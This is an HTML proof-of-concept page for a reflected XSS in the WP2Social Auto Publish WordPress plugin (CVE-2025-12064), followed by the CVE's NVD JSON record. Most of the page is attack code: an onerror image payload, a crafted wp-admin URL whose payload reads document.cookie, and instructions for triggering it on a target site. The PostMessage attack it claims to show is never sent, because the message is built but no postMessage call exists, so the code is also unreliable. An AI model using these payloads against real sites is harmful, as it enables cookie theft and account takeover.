CVE-2025-12064

<!-- CVE-2025-12064 PoC: WP2Social Auto Publish XSS via PostMessage --> <!DOCTYPE html> <html> <head> <title>CVE-2025-12064 PoC</title> </head> <body> <h1>CVE-2025-12064 Reflected XSS PoC</h1> <p>Target: WordPress site with WP2Social Auto Publish plugin <= 2.4.7</p> <script> // Malicious payload to be sent via PostMessage var maliciousPayload = '<img src=x onerror="alert(String.fromCharCode(88,83,83,32,69,120,112,108,111,105,116,101,100));">'; // Send the malicious payload to the target window // The vulnerable plugin listens for PostMessage without proper sanitization var targetWindow = window.opener || window.parent; // Construct the attack message var attackMessage = { action: 'some_action', data: maliciousPayload }; // Send the message (assuming the target has a listener) // In real attack, this would target the WordPress admin panel or any page with the vulnerable plugin loaded console.log('Sending malicious PostMessage payload...'); // Alternative: Direct injection via URL parameter (if reflected) var maliciousUrl = 'http://target-wordpress-site.com/wp-admin/admin.php?page=wp2social-auto-publish&param="\x3e\x3cimg src=x onerror=alert(document.cookie)>'; // Display instructions document.write('<p>To test this PoC:</p>'); document.write('<ol>'); document.write('<li>Ensure the target site has WP2Social Auto Publish plugin installed (version <= 2.4.7)</li>'); document.write('<li>Open the target WordPress site in another window</li>'); document.write('<li>Click the link or trigger the PostMessage communication</li>'); document.write('<li>The XSS payload should execute in the context of the target site</li>'); document.write('</ol>'); document.write('<p>Attack URL: ' + maliciousUrl + '</p>'); </script> </body> </html>

{"cve": {"id": "CVE-2025-12064", "sourceIdentifier": "[email protected]", "published": "2025-11-08T04:15:44.117", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP2Social Auto Publish plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PostMessage in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3386972%40facebook-auto-publish&new=3386972%40facebook-auto-publish&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/32eb02b8-71cd-4cdb-aa9d-3fd1850fb126?source=cve", "source": "[email protected]"}]}}